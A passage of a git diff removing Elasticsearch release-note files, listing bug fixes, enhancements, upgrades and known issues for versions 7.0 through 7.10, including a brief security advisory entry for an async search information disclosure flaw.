{es-issue}36364[#36364]) -* Fix issue with complex HAVING and GROUP BY ordinal {es-pull}36594[#36594] (issue: {es-issue}36059[#36059]) -* Be lenient for tests involving comparison to H2 but strict for csv spec tests {es-pull}36498[#36498] (issue: {es-issue}36483[#36483]) -* Non ISO 8601 versions of DAY_OF_WEEK and WEEK_OF_YEAR functions {es-pull}36358[#36358] (issue: {es-issue}36263[#36263]) -* Do not ignore all fields whose names start with underscore {es-pull}36214[#36214] (issue: {es-issue}36206[#36206]) -* Fix issue with wrong data type for scripted Grouping keys {es-pull}35969[#35969] (issue: {es-issue}35662[#35662]) -* Fix translation of math functions to painless {es-pull}35910[#35910] (issue: {es-issue}35654[#35654]) -* Fix jdbc jar to include deps {es-pull}35602[#35602] -* Fix query translation for scripted queries {es-pull}35408[#35408] (issue: {es-issue}35232[#35232]) -* Clear the cursor if nested inner hits are enough to fulfill the query required limits {es-pull}35398[#35398] (issue: {es-issue}35176[#35176]) -* Introduce IsNull node to simplify expressions {es-pull}35206[#35206] (issues: {es-issue}34876[#34876], {es-issue}35171[#35171]) -* The SSL default configuration shouldn't override the https protocol if used {es-pull}34635[#34635] (issue: {es-issue}33817[#33817]) -* Minor 
fix for javadoc {es-pull}32573[#32573] (issue: {es-issue}32553[#32553])
-* Prevent grouping over grouping functions {es-pull}38649[#38649] (issue: {es-issue}38308[#38308])
-* Relax StackOverflow circuit breaker for constants {es-pull}38572[#38572] (issue: {es-issue}38571[#38571])
-* Fix issue with IN not resolving to underlying keyword field {es-pull}38440[#38440] (issue: {es-issue}38424[#38424])
-* Change the Intervals milliseconds precision to 3 digits {es-pull}38297[#38297] (issue: {es-issue}37423[#37423])
-* Fix esType for DATETIME/DATE and INTERVALS {es-pull}38179[#38179] (issue: {es-issue}38051[#38051])
-* Added SSL configuration options tests {es-pull}37875[#37875] (issue: {es-issue}37711[#37711])
-* Fix casting from date to numeric type to use millis {es-pull}37869[#37869] (issue: {es-issue}37655[#37655])
-* Fix BasicFormatter NPE {es-pull}37804[#37804]
-* Return Intervals in SQL format for CLI {es-pull}37602[#37602] (issues: {es-issue}29970[#29970], {es-issue}36186[#36186], {es-issue}36432[#36432])
-* Fix object extraction from sources {es-pull}37502[#37502] (issue: {es-issue}37364[#37364])
-* Fix issue with field names containing "." {es-pull}37364[#37364] (issue: {es-issue}37128[#37128])
-* Fix bug regarding alias fields with dots {es-pull}37279[#37279] (issue: {es-issue}37224[#37224])
-* Proper handling of COUNT(field_name) and COUNT(DISTINCT field_name) {es-pull}37254[#37254] (issue: {es-issue}30285[#30285])
-* Fix COUNT DISTINCT filtering {es-pull}37176[#37176] (issue: {es-issue}37086[#37086])
-* Fix issue with wrong NULL optimization {es-pull}37124[#37124] (issue: {es-issue}35872[#35872])
-* Fix issue with complex expression as args of PERCENTILE/_RANK {es-pull}37102[#37102] (issue: {es-issue}37099[#37099])
-* Handle the bwc Joda ZonedDateTime scripting class in Painless {es-pull}37024[#37024] (issue: {es-issue}37023[#37023])
-* Fix bug regarding histograms usage in scripting {es-pull}36866[#36866]
-* Fix issue with always false filter involving functions {es-pull}36830[#36830] (issue: {es-issue}35980[#35980])
-* Protocol returns ISO 8601 String formatted dates instead of Long for JDBC/ODBC requests {es-pull}36800[#36800] (issue: {es-issue}36756[#36756])
-* Enhance Verifier to prevent aggregate or grouping functions from {es-pull}36799[#36799] (issue: {es-issue}36798[#36798])
-* Add missing handling of IP field in JDBC {es-pull}40384[#40384] (issue: {es-issue}40358[#40358])
-* Fix metric aggs on date/time to not return double {es-pull}40377[#40377] (issues: {es-issue}39492[#39492], {es-issue}40376[#40376])
-* CAST supports both SQL and ES types {es-pull}40365[#40365] (issue: {es-issue}40282[#40282])
-* Fix RLIKE bug and improve testing for RLIKE statement {es-pull}40354[#40354] (issues: {es-issue}34609[#34609], {es-issue}39931[#39931])
-* Unwrap the first value in an array in case of array leniency {es-pull}40318[#40318] (issue: {es-issue}40296[#40296])
-* Preserve original source for cast/convert function {es-pull}40271[#40271] (issue: {es-issue}40239[#40239])
-* Fix LIKE function equality by considering its pattern as well
{es-pull}40260[#40260] (issue: {es-issue}39931[#39931]) -* Fix issue with optimization on queries with ORDER BY/LIMIT {es-pull}40256[#40256] (issue: {es-issue}40211[#40211]) -* Rewrite ROUND and TRUNCATE functions with a different optional parameter handling method {es-pull}40242[#40242] (issue: {es-issue}40001[#40001]) -* Fix issue with getting DATE type in JDBC {es-pull}40207[#40207] -* Fix issue with date columns returned always in UTC {es-pull}40163[#40163] (issue: {es-issue}40152[#40152]) -* Add multi_value_field_leniency inside FieldHitExtractor {es-pull}40113[#40113] (issue: {es-issue}39700[#39700]) -* Fix incorrect ordering of groupings (GROUP BY) based on orderings (ORDER BY) {es-pull}40087[#40087] (issue: {es-issue}39956[#39956]) -* Fix bug with JDBC timezone setting and DATE type {es-pull}39978[#39978] (issue: {es-issue}39915[#39915]) -* Use underlying exact field for LIKE/RLIKE {es-pull}39443[#39443] (issue: {es-issue}39442[#39442]) -* Fix display size for DATE/DATETIME {es-pull}40669[#40669] -* Have LIKE/RLIKE use wildcard and regexp queries {es-pull}40628[#40628] (issue: {es-issue}40557[#40557]) -* Fix getTime() methods in JDBC {es-pull}40484[#40484] -* SYS TABLES: enumerate tables of requested types {es-pull}40535[#40535] (issue: {es-issue}40348[#40348]) -* Passing an input to the CLI "freezes" the CLI after displaying an error message {es-pull}40164[#40164] (issue: {es-issue}40557[#40557]) -* Wrap ZonedDateTime parameters inside scripts {es-pull}39911[#39911] (issue: {es-issue}39877[#39877]) -* ConstantProcessor can now handle NamedWriteable {es-pull}39876[#39876] (issue: {es-issue}39875[#39875]) -* Extend the multi dot field notation extraction to lists of values {es-pull}39823[#39823] (issue: {es-issue}39738[#39738]) -* Values in datetime script aggs should be treated as long {es-pull}39773[#39773] (issue: {es-issue}37042[#37042]) -* Don't allow inexact fields for MIN/MAX {es-pull}39563[#39563] (issue: {es-issue}39427[#39427]) -* Fix merging of incompatible multi-fields {es-pull}39560[#39560] (issue: {es-issue}39547[#39547]) -* Fix COUNT DISTINCT column name {es-pull}39537[#39537] (issue: {es-issue}39511[#39511]) -* Enable accurate hit tracking on demand {es-pull}39527[#39527] (issue: {es-issue}37971[#37971]) -* Ignore UNSUPPORTED fields for JDBC and ODBC modes in 'SYS COLUMNS' {es-pull}39518[#39518] (issue: {es-issue}39471[#39471]) -* Enforce JDBC driver - ES server version parity {es-pull}38972[#38972] (issue: {es-issue}38775[#38775]) -* Fall back to using the field name for column label {es-pull}38842[#38842] (issue: {es-issue}38831[#38831]) - -Suggesters:: -* Fix duplicate removal when merging completion suggestions {es-pull}36996[#36996] (issue: {es-issue}35836[#35836]) - -Task Management:: -* Un-assign persistent tasks as nodes exit the cluster {es-pull}37656[#37656] - -Watcher:: -* Watcher accounts constructed lazily {es-pull}36656[#36656] -* Only trigger a watch if new or schedule/changed {es-pull}35908[#35908] -* Fix Watcher NotificationService's secure settings {es-pull}35610[#35610] (issue: {es-issue}35378[#35378]) -* Fix integration tests to ensure correct start/stop of Watcher {es-pull}35271[#35271] (issues: {es-issue}29877[#29877], {es-issue}30705[#30705], {es-issue}33291[#33291], {es-issue}34448[#34448], {es-issue}34462[#34462]) - -ZenDiscovery:: -* Remove duplicate discovered peers {es-pull}35505[#35505] -* Respect the no_master_block setting {es-pull}36478[#36478] -* Cancel GetDiscoveredNodesAction when bootstrapped {es-pull}36423[#36423] (issues: 
{es-issue}36380[#36380], {es-issue}36381[#36381]) -* Only elect master-eligible nodes {es-pull}35996[#35996] -* Remove duplicate discovered peers {es-pull}35505[#35505] -* Fix size of rolling-upgrade bootstrap config {es-pull}38031[#38031] -* Always return metadata version if metadata is requested {es-pull}37674[#37674] -* Elect freshest master in upgrade {es-pull}37122[#37122] (issue: {es-issue}40[#40]) -* Fix cluster state persistence for single-node discovery {es-pull}36825[#36825] - -[[regression-7.0.0]] -[discrete] -=== Regressions - -Infra/Core:: -* Restore date aggregation performance in UTC case {es-pull}38221[#38221] (issue: {es-issue}37826[#37826]) -* Speed up converting of temporal accessor to zoned date time {es-pull}37915[#37915] (issue: {es-issue}37826[#37826]) - -Mapping:: -* Performance fix. Reduce deprecation calls for the same bulk request {es-pull}37415[#37415] (issue: {es-issue}37411[#37411]) - -Scripting:: -* Use Number as a return value for BucketAggregationScript {es-pull}35653[#35653] (issue: {es-issue}35351[#35351]) - -[[upgrade-7.0.0]] -[discrete] -=== Upgrades - -Discovery-Plugins:: -* Bump jackson-databind version for AWS SDK {es-pull}39183[#39183] - -Engine:: -* Upgrade to lucene-8.0.0-snapshot-83f9835. {es-pull}37668[#37668] -* Upgrade to Lucene 8.0.0-snapshot-ff9509a8df {es-pull}39350[#39350] -* Upgrade to Lucene 8.0.0 {es-pull}39992[#39992] (issue: {es-issue}39640[#39640]) - -Geo:: -* Upgrade JTS to 1.14.0 {es-pull}29141[#29141] (issue: {es-issue}29122[#29122]) - -Ingest:: -* Update geolite2 database in ingest geoip plugin {es-pull}33840[#33840] -* Bump jackson-databind version for ingest-geoip {es-pull}39182[#39182] - -Infra/Core:: -* Upgrade to a Lucene 8 snapshot {es-pull}33310[#33310] (issues: {es-issue}32899[#32899], {es-issue}33028[#33028], {es-issue}33309[#33309]) - -Security:: -* Upgrade the bouncycastle dependency to 1.61 {es-pull}40017[#40017] (issue: {es-issue}40011[#40011]) - -Search:: -* Upgrade to Lucene 8.0.0 GA {es-pull}39992[#39992] (issue: {es-issue}39640[#39640]) - -Snapshot/Restore:: -* plugins/repository-gcs: Update google-cloud-storage/core to 1.59.0 {es-pull}39748[#39748] (issue: {es-issue}39366[#39366]) - -Network:: -* Fix Netty Leaks by upgrading to 4.1.28 {es-pull}32511[#32511] (issue: {es-issue}32487[#32487]) -* Upgrade Netty 4.3.32.Final {es-pull}36102[#36102] (issue: {es-issue}35360[#35360]) - -Machine Learning:: -* No need to add state doc mapping on job open in 7.x {es-pull}37759[#37759] diff --git a/docs/reference/release-notes/7.1.asciidoc b/docs/reference/release-notes/7.1.asciidoc deleted file mode 100644 index ea7d4ac2475..00000000000 --- a/docs/reference/release-notes/7.1.asciidoc +++ /dev/null @@ -1,77 +0,0 @@ -[[release-notes-7.1.1]] -== {es} version 7.1.1 - -Also see <>. - -[discrete] -=== Known issues - -* Applying deletes or updates on an index after it has been shrunk may corrupt -the index. In order to prevent this issue, it is recommended to stop shrinking -read-write indices. For read-only indices, it is recommended to force-merge -indices after shrinking, which significantly reduces the likeliness of this -corruption in the case that deletes/updates would be applied by mistake. This -bug is fixed in {es} 7.7 and later versions. More details can be found on the -https://issues.apache.org/jira/browse/LUCENE-9300[corresponding issue]. 
- -* Indices created in 6.x with <> and <> fields using formats -that are incompatible with java.time patterns will cause parsing errors, incorrect date calculations or wrong search results. -https://github.com/elastic/elasticsearch/pull/52555 -This is fixed in {es} 7.7 and later versions. - -[[bug-7.1.1]] -[discrete] -=== Bug fixes - -Distributed:: -* Avoid unnecessary persistence of retention leases {es-pull}42299[#42299] -* Execute actions under permit in primary mode only {es-pull}42241[#42241] (issues: {es-issue}40386[#40386], {es-issue}41686[#41686]) - -Infra/REST API:: -* Remove deprecated _source_exclude and _source_include from get API spec {es-pull}42188[#42188] - -[[release-notes-7.1.0]] -== {es} version 7.1.0 - -Also see <>. - -[[enhancement-7.1.0]] -[discrete] -=== Enhancements - -Security:: -* Moved some security features to basic. See {ref-bare/release-highlights-7.1.0.html[7.1.0 Release highlights]. - -Authentication:: -* Log warning when unlicensed realms are skipped {es-pull}41778[#41778] - -Infra/Settings:: -* Drop distinction in entries for keystore {es-pull}41701[#41701] - - -[[bug-7.1.0]] -[discrete] -=== Bug fixes - -Cluster Coordination:: -* Handle serialization exceptions during publication {es-pull}41781[#41781] (issue: {es-issue}41090[#41090]) - -Infra/Core:: -* Fix fractional seconds for strict_date_optional_time {es-pull}41871[#41871] (issue: {es-issue}41633[#41633]) - -Network:: -* Enforce transport TLS on Basic with Security {es-pull}42150[#42150] - -Reindex:: -* Allow reindexing into write alias {es-pull}41677[#41677] (issue: {es-issue}41667[#41667]) - -SQL:: -* SQL: Fix issue regarding INTERVAL * number {es-pull}42014[#42014] (issue: {es-issue}41239[#41239]) -* SQL: Remove CircuitBreaker from parser {es-pull}41835[#41835] (issue: {es-issue}41471[#41471]) - -Search:: -* Fix IAE on cross_fields query introduced in 7.0.1 {es-pull}41938[#41938] (issues: {es-issue}41125[#41125], {es-issue}41934[#41934]) - - - - diff --git a/docs/reference/release-notes/7.10.asciidoc b/docs/reference/release-notes/7.10.asciidoc deleted file mode 100644 index 0ac5a4510a5..00000000000 --- a/docs/reference/release-notes/7.10.asciidoc +++ /dev/null @@ -1,479 +0,0 @@ -[[release-notes-7.10.2]] -== {es} version 7.10.2 - -Also see <>. - -[discrete] -[[security-updates-7.10.2]] -=== Security updates - -* An information disclosure flaw was found in the {es} async search API. -Users who execute an async search will store the HTTP headers. -A user with the ability to read the `.tasks` index could obtain -sensitive request headers of other users in the cluster. -All versions of {es} between 7.7.0 and 7.10.1 are affected by this flaw. -You must upgrade to {es} version 7.10.2 to obtain the fix. -https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22132[CVE-2021-22132] - -[[bug-7.10.2]] -[float] -=== Bug fixes - -EQL:: -* Fix early trimming of in-flight data {es-pull}66493[#66493] - -Engine:: -* Fix the earliest last modified age of translog issue. 
{es-pull}64753[#64753] -* Fix the version and term field initialization error of NoOpResult {es-pull}66269[#66269] (issue: {es-issue}66267[#66267]) - -Features/Data streams:: -* Allow more legit cases in Metadata.Builder.validateDataStreams {es-pull}65791[#65791] - -Features/Features:: -* Make FilterAllocationDecider totally ignore tier-based allocation settings {es-pull}67019[#67019] (issue: {es-issue}66679[#66679]) - -Features/Ingest:: -* Fix whitespace as a separator in CSV processor {es-pull}67045[#67045] (issue: {es-issue}67013[#67013]) - -Highlighting:: -* Fix bug where fvh fragments could be loaded from wrong doc {es-pull}65641[#65641] (issues: {es-issue}60179[#60179], {es-issue}65533[#65533]) - -Features/ILM+SLM:: -* Create AllocationDeciders in the main method of the ILM step {es-pull}65037[#65037] (issue: {es-issue}64529[#64529]) - -Infra/REST API:: -* Fix cat tasks api params in spec and handler {es-pull}66272[#66272] (issue: {es-issue}59493[#59493]) -* Mark Cat Tasks API as experimental in rest-api-spec {es-pull}66536[#66536] (issues: {es-issue}51628[#51628], {es-issue}65823[#65823]) -* Mark Task APIs as experimental in rest-api-spec {es-pull}65823[#65823] (issue: {es-issue}51628[#51628]) - -Infra/Scripting:: -* Fix static inner class resolution in Painless {es-pull}67027[#67027] (issue: {es-issue}66823[#66823]) - -Infra/Settings:: -* Correctly determine defaults of settings which depend on other settings {es-pull}65989[#65989] (issue: {es-issue}47890[#47890]) -* Do not interpret SecurityException in KeystoreAwareCommand {es-pull}65366[#65366] - -QL:: -* Handle IP type fields extraction with ignore_malformed property {es-pull}66622[#66622] (issue: {es-issue}66675[#66675]) - -Machine Learning:: -* Change to only calculate model size on initial load to prevent slow cache promotions {es-pull}66451[#66451] - -Network:: -* Ensure notify when proxy connections disconnect {es-pull}65697[#65697] (issue: {es-issue}65443[#65443]) -* Fix AbstractClient#execute Listener Leak {es-pull}65415[#65415] (issue: {es-issue}65405[#65405]) - -SQL:: -* Abort sorting in case of local agg sort queue overflow {es-pull}65687[#65687] (issue: {es-issue}65685[#65685]) -* Verify filter's condition type {es-pull}66268[#66268] (issue: {es-issue}66254[#66254]) - -Search:: -* Fix regressions around nested hits and disabled _source {es-pull}66572[#66572] (issues: {es-issue}60494[#60494], {es-issue}66524[#66524]) -* Make sure shared source always represents the top-level root document {es-pull}66725[#66725] (issues: {es-issue}60494[#60494], {es-issue}66577[#66577]) - -Security:: -* Store and use only internal security headers {es-pull}66365[#66365] - -Snapshot/Restore:: -* Also reroute after shard snapshot size fetch failure {es-pull}65436[#65436] (issues: {es-issue}61906[#61906], {es-issue}64372[#64372]) - - -[[release-notes-7.10.1]] -== {es} version 7.10.1 - -Also see <>. - -[[known-issues-7.10.1]] -[discrete] -=== Known issues -* In {es} 7.10.0 there were several regressions around loading nested documents. These have been addressed in {es} 7.10.2. -** With multiple layers of nested `inner_hits`, we can fail to load the _source. ({es-issue}66577[#66577]) -** With nested `inner_hits`, the fast vector highlighter may load snippets from the wrong document. ({es-issue}65533[#65533]) -** When _source is disabled, we can fail load nested `inner_hits` and `top_hits`. 
({es-issue}66572[#66572]) - -[[bug-7.10.1]] -[float] -=== Bug fixes - -Allocation:: -* Fix NPE in toString of FailedShard {es-pull}64770[#64770] - -CCR:: -* Stop renew retention leases when follow task fails {es-pull}65168[#65168] - -CRUD:: -* Propogate rejected execution during bulk actions {es-pull}64842[#64842] (issue: {es-issue}64450[#64450]) - -Cluster Coordination:: -* Fix up roles after rolling upgrade {es-pull}64693[#64693] (issue: {es-issue}62840[#62840]) - -EQL:: -* Allow null tiebreakers inside ordinals/sequences {es-pull}65033[#65033] (issue: {es-issue}64706[#64706]) -* Fix "resource not found" exception on existing EQL async search {es-pull}65167[#65167] (issue: {es-issue}65108[#65108]) -* Fix aggressive/incorrect until policy in sequences {es-pull}65156[#65156] - -Features/ILM+SLM:: -* Fix SetSingleNodeAllocateStep for data tier deployments {es-pull}64679[#64679] - -Features/Watcher:: -* Watcher understands hidden expand wildcard value {es-pull}65332[#65332] (issue: {es-issue}65148[#65148]) - -Geo:: -* Fix handling of null values in geo_point {es-pull}65307[#65307] (issue: {es-issue}65306[#65306]) - -Infra/Core:: -* Fix date math hidden index resolution {es-pull}65236[#65236] (issue: {es-issue}65157[#65157]) - -Infra/Scripting:: -* Fix Painless casting bug in compound assignment for String {es-pull}65329[#65329] -* Revert null-safe behavior to error at run-time instead of compile-time {es-pull}65099[#65099] (issue: {es-issue}65098[#65098]) - -Machine Learning:: -* Extract dependent variable's mapping correctly in case of a multi-field {es-pull}63813[#63813] -* Fix bug with data frame analytics classification test data sampling when using custom feature processors {es-pull}64727[#64727] -* Fix custom feature processor extraction bugs around boolean fields and custom one_hot feature output order {es-pull}64937[#64937] -* Protect against stack overflow while loading data frame analytics data {es-pull}64947[#64947] -* Fix a bug where the peak_model_bytes value of the model_size_stats object was not restored from the anomaly detector job snapshots {ml-pull}1572[#1572] - -Mapping:: -* Correctly serialize search-as-you-type analyzer {es-pull}65359[#65359] (issue: {es-issue}65319[#65319]) -* Unused boost parameter should not throw mapping exception {es-pull}64999[#64999] (issue: {es-issue}64982[#64982]) - -SQL:: -* Fix the return type problem in the sign function {es-pull}64845[#64845] - -Search:: -* Fix cacheability of custom LongValuesSource in TermsSetQueryBuilder {es-pull}65367[#65367] -* SourceValueFetcher should check all possible source fields {es-pull}65375[#65375] - -Snapshot/Restore:: -* Fix Broken Error Handling in CacheFile#acquire {es-pull}65342[#65342] (issue: {es-issue}65302[#65302]) -* Fix Two Snapshot Clone State Machine Bugs {es-pull}65042[#65042] - - -[[release-notes-7.10.0]] -== {es} version 7.10.0 - -Also see <>. - -[[known-issues-7.10.0]] -[discrete] -=== Known issues - -* SQL: If a `WHERE` clause contains at least two relational operators joined by -`AND`, of which one is a comparison (`<=`, `<`, `>=`, `>`) and another one is -an inequality (`!=`, `<>`), both against literals or foldable expressions, the -inequality will be ignored. The workaround is to substitute the inequality -with a `NOT IN` operator. -+ -We have fixed this issue in {es} 7.10.1 and later versions. For more details, -see {es-issue}65488[#65488]. - -* There were several regressions around loading nested documents. These have been addressed in {es} 7.10.2. 
-** With multiple layers of nested `inner_hits`, we can fail to load the _source. ({es-issue}66577[#66577]) -** With nested `inner_hits`, the fast vector highlighter may load snippets from the wrong document. ({es-issue}65533[#65533]) -** When _source is disabled, we can fail load nested `inner_hits` and `top_hits`. ({es-issue}66572[#66572]) - -[[breaking-7.10.0]] -[float] -=== Breaking changes - -Authentication:: -* API key name should always be required for creation {es-pull}59836[#59836] (issue: {es-issue}59484[#59484]) - -Network:: -* Set specific keepalive options by default on supported platforms {es-pull}59278[#59278] - - - -[[breaking-java-7.10.0]] -[float] -=== Breaking Java changes - -Machine Learning:: -* Deprecate allow_no_jobs and allow_no_datafeeds in favor of allow_no_match {es-pull}60601[#60601] (issue: {es-issue}60642[#60642]) - -Mapping:: -* Pass SearchLookup supplier through to fielddataBuilder {es-pull}61430[#61430] (issue: {es-issue}59332[#59332]) - - - -[[deprecation-7.10.0]] -[float] -=== Deprecations - -Cluster Coordination:: -* Deprecate and ignore join timeout {es-pull}60872[#60872] (issue: {es-issue}60873[#60873]) - -Machine learning:: -* Renames \*/inference* APIs to \*/trained_models* {es-pull}63097[#63097] - -[[feature-7.10.0]] -[float] -=== New features - -Aggregations:: -* Add rate aggregation {es-pull}61369[#61369] (issue: {es-issue}60674[#60674]) - -Features/Features:: -* Add data tiers (hot, warm, cold, frozen) as custom node roles {es-pull}60994[#60994] (issue: {es-issue}60848[#60848]) -* Allocate newly created indices on data_hot tier nodes {es-pull}61342[#61342] (issue: {es-issue}60848[#60848]) - -Features/ILM+SLM:: -* ILM migrate data between tiers {es-pull}61377[#61377] (issue: {es-issue}60848[#60848]) -* ILM: add force-merge step to searchable snapshots action {es-pull}60819[#60819] (issues: {es-issue}53488[#53488], {es-issue}56215[#56215]) - -Machine Learning:: -* Implement AucRoc metric for classification {es-pull}60502[#60502] (issue: {es-issue}62160[#62160]) - -Mapping:: -* Introduce 64-bit unsigned long field type {es-pull}60050[#60050] (issue: {es-issue}32434[#32434]) - -Search:: -* Add search 'fields' option to support high-level field retrieval {es-pull}60100[#60100] (issues: {es-issue}49028[#49028], {es-issue}55363[#55363]) - - - -[[enhancement-7.10.0]] -[float] -=== Enhancements - -Aggregations:: -* Adds hard_bounds to histogram aggregations {es-pull}59175[#59175] (issue: {es-issue}50109[#50109]) -* Allocate slightly less per bucket {es-pull}59740[#59740] -* Improve reduction of terms aggregations {es-pull}61779[#61779] (issue: {es-issue}51857[#51857]) -* Speed up date_histogram by precomputing ranges {es-pull}61467[#61467] - -Analysis:: -* Support ignore_keywords flag for word delimiter graph token filter {es-pull}59563[#59563] (issue: {es-issue}59491[#59491]) - -Authentication:: -* Cache API key doc to reduce traffic to the security index {es-pull}59376[#59376] (issues: {es-issue}53940[#53940], {es-issue}55836[#55836]) -* Include authentication type for the authenticate response {es-pull}61247[#61247] (issue: {es-issue}61130[#61130]) -* Oidc additional client auth types {es-pull}58708[#58708] -* Warn about unlicensed realms if no auth token can be extracted {es-pull}61402[#61402] (issue: {es-issue}61090[#61090]) - -Authorization:: -* Add DEBUG logging for undefined role mapping field {es-pull}61246[#61246] (issue: {es-issue}48562[#48562]) -* Add more context to index access denied errors {es-pull}60357[#60357] (issue: 
{es-issue}42166[#42166]) - -CRUD:: -* Add configured indexing memory limit to node stats {es-pull}60342[#60342] -* Dedicated threadpool for system index writes {es-pull}61655[#61655] - -Cluster Coordination:: -* Add more useful toString on cluster state observers {es-pull}60277[#60277] -* Fail invalid incremental cluster state writes {es-pull}61030[#61030] -* Provide option to allow writes when master is down {es-pull}60605[#60605] - -Distributed:: -* Detect noop of update index settings {es-pull}61348[#61348] -* Thread safe clean up of LocalNodeModeListeners {es-pull}59932[#59932] (issue: {es-issue}59801[#59801]) - -Features/CAT APIs:: -* Adding Hit counts and Miss counts for QueryCache exposed through REST API {es-pull}60114[#60114] (issue: {es-issue}48645[#48645]) - -Features/Features:: -* Add aggregation list to node info {es-pull}60074[#60074] (issue: {es-issue}52057[#52057]) -* Adding new `require_alias` option to indexing requests {es-pull}58917[#58917] (issue: {es-issue}55267[#55267]) - -Features/ILM+SLM:: -* Move internal index templates to composable templates {es-pull}61457[#61457] - -Features/Ingest:: -* Add network from MaxMind Geo ASN database {es-pull}61676[#61676] -* Allow_duplicates option for append processor {es-pull}61916[#61916] (issue: {es-issue}57543[#57543]) -* Configurable output format for date processor {es-pull}61324[#61324] (issue: {es-issue}42523[#42523]) -* Enhance the ingest node simulate verbose output {es-pull}60433[#60433] (issue: {es-issue}56004[#56004]) -* Per processor description for verbose simulate {es-pull}58207[#58207] (issue: {es-issue}57906[#57906]) -* Preserve grok pattern ordering and add sort option {es-pull}61671[#61671] (issue: {es-issue}40819[#40819]) - -Features/Java High Level REST Client:: -* HLRC: UpdateByQuery API with wait_for_completion being false {es-pull}58552[#58552] (issues: {es-issue}35202[#35202], {es-issue}46350[#46350]) - -Infra/Core:: -* Add logstash system index APIs {es-pull}53350[#53350] -* Deprecate REST access to System Indices {es-pull}60945[#60945] -* Speed up Compression Logic by Pooling Resources {es-pull}61358[#61358] -* System index reads in separate threadpool {es-pull}57936[#57936] (issues: {es-issue}37867[#37867], {es-issue}50251[#50251]) - -Infra/Logging:: -* Do not create two loggers for DeprecationLogger {es-pull}58435[#58435] -* Header warning logging refactoring {es-pull}55941[#55941] (issues: {es-issue}52369[#52369], {es-issue}55699[#55699]) -* Write deprecation logs to a data stream {es-pull}61484[#61484] (issues: {es-issue}46106[#46106], {es-issue}61474[#61474]) - -Infra/Packaging:: -* Add UBI docker builds {es-pull}60742[#60742] -* Upgrade Centos version in Dockerfile to 8 {es-pull}59019[#59019] - -Infra/Resiliency:: -* Remove node from cluster when node locks broken {es-pull}61400[#61400] (issues: {es-issue}52680[#52680], {es-issue}58373[#58373]) - -Infra/Scripting:: -* Augment String with sha1 and sha256 {es-pull}59671[#59671] (issue: {es-issue}59633[#59633]) -* Converts casting and def support {es-pull}61350[#61350] (issue: {es-issue}59647[#59647]) - -Machine Learning:: -* Add a "verbose" option to the data frame analytics stats endpoint {es-pull}59589[#59589] (issue: {es-issue}59125[#59125]) -* Add new include flag to get trained models API for model training metadata {es-pull}61922[#61922] -* Add new feature_processors field for data frame analytics {es-pull}60528[#60528] (issue: {es-issue}59327[#59327]) -* Add new n_gram_encoding custom processor {es-pull}61578[#61578] -* During nightly 
maintenance delete jobs whose original deletion tasks were lost {es-pull}60121[#60121] (issue: {es-issue}42840[#42840]) -* Suspend persistence of trained model stats when ML upgrade mode is enabled {es-pull}61143[#61143] -* Calculate total feature importance to store with model metadata {ml-pull}1387[#1387] -* Change outlier detection feature_influence format to array with nested objects {ml-pull}1475[#1475], {es-pull}62068[#62068] -* Add timeouts to named pipe connections {ml-pull}1514[#1514], {es-pull}62993[#62993] (issue: {ml-issue}1504[#1504]) - -Mapping:: -* Add field type for version strings {es-pull}59773[#59773] (issue: {es-issue}48878[#48878]) -* Allow [null] values in [null_value] {es-pull}61798[#61798] (issues: {es-issue}7978[#7978], {es-issue}58823[#58823]) -* Allow metadata fields in the _source {es-pull}61590[#61590] (issue: {es-issue}58339[#58339]) - -Network:: -* Improve deserialization failure logging {es-pull}60577[#60577] (issue: {es-issue}38939[#38939]) -* Log and track open/close of transport connections {es-pull}60297[#60297] - -Performance:: -* Speed up empty highlighting many fields {es-pull}61860[#61860] - -SQL:: -* Add option to provide the delimiter for the CSV format {es-pull}59907[#59907] (issue: {es-issue}41634[#41634]) -* Implement DATE_PARSE function for parsing strings into DATE values {es-pull}57391[#57391] (issue: {es-issue}54962[#54962]) -* Implement FORMAT function {es-pull}55454[#55454] (issue: {es-issue}54965[#54965]) - -Search:: -* Avoid reloading _source for every inner hit {es-pull}60494[#60494] (issue: {es-issue}32818[#32818]) -* Cancel multisearch when http connection closed {es-pull}61399[#61399] -* Enable cancellation for msearch requests {es-pull}61337[#61337] -* Executes incremental reduce in the search thread pool {es-pull}58461[#58461] (issues: {es-issue}51857[#51857], {es-issue}53411[#53411]) -* Introduce point in time APIs in x-pack basic {es-pull}61062[#61062] (issues: {es-issue}26472[#26472], {es-issue}46523[#46523]) -* ParametrizedFieldMapper to run validators against default value {es-pull}60042[#60042] (issue: {es-issue}59332[#59332]) -* Add case insensitive flag for "term" family of queries {es-pull}61596[#61596] (issue: {es-issue}61546[#61546]) -* Add case insensitive support for regex queries {es-pull}59441[#59441] -* Tweak toXContent implementation of ParametrizedFieldMapper {es-pull}59968[#59968] -* Implement fields value fetching for the `text`, `search_as_you_type` and `token_count` field types {es-pull}63515[#63515] -* Make term/prefix/wildcard/regex query parsing more lenient, with respect to the `case_insensitive` flag {es-pull}63926[#63926] (issue: {es-issue}63893[#63893]) - -Snapshot/Restore:: -* Add repositories metering API {es-pull}60371[#60371] -* Clone Snapshot API {es-pull}61839[#61839] -* Determine shard size before allocating shards recovering from snapshots {es-pull}61906[#61906] -* Introduce index based snapshot blob cache for Searchable Snapshots {es-pull}60522[#60522] -* Validate snapshot UUID during restore {es-pull}59601[#59601] (issue: {es-issue}50999[#50999]) - -Store:: -* Report more details of unobtainable ShardLock {es-pull}61255[#61255] (issue: {es-issue}38807[#38807]) - - -Transform:: -* Add support for missing bucket {es-pull}59591[#59591] (issues: {es-issue}42941[#42941], {es-issue}55102[#55102]) - - - -[[bug-7.10.0]] -[float] -=== Bug fixes - -Aggregations:: -* Fix AOOBE when setting min_doc_count to 0 in significant_terms {es-pull}60823[#60823] (issues: {es-issue}60683[#60683], 
